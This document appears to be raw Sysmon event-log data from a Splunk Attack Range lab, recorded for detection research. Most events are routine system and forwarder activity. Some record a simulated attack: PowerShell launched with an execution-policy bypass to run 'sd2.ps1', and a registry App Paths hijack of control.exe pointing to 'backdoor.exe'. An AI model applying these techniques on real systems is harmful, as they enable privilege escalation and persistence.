11241100x80000000000000001055152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.395{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001055151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.393{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.341{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001055149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=F162F5A3A8EA069EFE08946426F0949D,SHA256=3548E24A809395CF1715D89F4CC3F6DE8CCF1F0DE7425435E6710264AC524053,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.326{466BC892-F89E-60EB-087E-00000000CF01}80729788C:\Windows\system32\conhost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.292{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.277{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001055138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.247{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x8000000000000000810598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:03.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3729C1BC5018BFBDCA51583F32AB161,SHA256=CBD631EBA80B7D4B9CC46053C6F52CEC66786E058F5A13AF165F0DB89C45B562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B64711157489F03713EC9AFE375F7063,SHA256=18A315AAD2AFF9FAF3CE9316D72F966D019FCF6FB5AEBC2198E9AF8386B3BD02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547CE19615E419F2404430ADC606E1AE,SHA256=56E1B94B77CFD6E52C260A96B759A476D2F3EDECAD9A85631987898548863DBA,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001055189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.626{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:03.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAB2E5EDCF0EB0B2069AAF17079EEC3,SHA256=037DB6BFE7607BE899B5FCD090D997095278753904E7E648530F2385CF1750E3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:09:03.095{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 23542300x80000000000000001055192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.756{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A69199328C0EE329D92C6F1B95922534,SHA256=E6527D74E953DF33BD1FA3E6A6058745FEBDF2DFB774AC6661AC7A6FA9C095A3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:04.899{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C546DD3D13D08D501970C28F79457785,SHA256=6FC63EC02FBACD5780D50B539DE18D844480FE492C9E32A03C5BEC15ED81BE91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:05.901{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34A72A369C7A4ED514F1711E00BDE048,SHA256=16C0A411D00477C427E368808F186115819480A44A6ABA01412C3B4C5DCFA350,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.771{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF2ACC4A19AE8E3579DC6E09606D03B,SHA256=2E65E078086658049F3E8DB337ABE245C5F6A63B931279CEE916974B79FACE7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:06.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=907C888631C32AD3DA62DD4CF02571FD,SHA256=BECD1CD3B665CB1FB27CBA339D5A1A4370D83BF3CDF68240CF2580D3E688E4AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:05.285{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57480-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DEE4002BB8031A65277DB817F9B91D6F,SHA256=EEF53800920962243D14ADBDDFCE983D940D507BAC4861A993A33B904CBF5108,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21FCF9D7C3800F1A7A85F6C36F29DDD,SHA256=D1ECC8E1A8A79B4552B1BEB6DADBD3F4C726B1F1FB8E96FB574A987D2CC9B35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.555{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.508{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:06.493{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:09:06.490{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1218.137029583C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:09:06.490{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1218.137029583C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:06.193{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:07.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B12A024DF9839401B00CBB220162836,SHA256=534D523C6317D8DED41F8728D80251577309869EAE7BA76B3B16322A5A65C1E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61989-false10.0.1.12-8000- 354300x80000000000000001055204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.347{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-28137-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:07.792{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E13B1D2458A62EB076F60BEBD03EF9,SHA256=66B6CA05C2FDE904675413D24E453BE08BC58259444FB11649C529F19225FCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:07.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44E3B8C0830AA5AB39F241982BAF0A19,SHA256=6DE8CB43E2BAA40A1B2176D82E1270D6CEB1678F16B8F57C79D6FE9ADC702FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A1BF01F15590085960385DB96B78ECD,SHA256=F8E22D24689BCCB0889E97BF00F3631E1D790B79E7391D7D5BFF7BA33A95DB71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F3D4FFDB08A42E245718FD237DBDA304,SHA256=64134235CB61AEBC2EA6C3AC36A08CB01775B2C826D6079AB0A09D4E1E6D7F27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.593{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
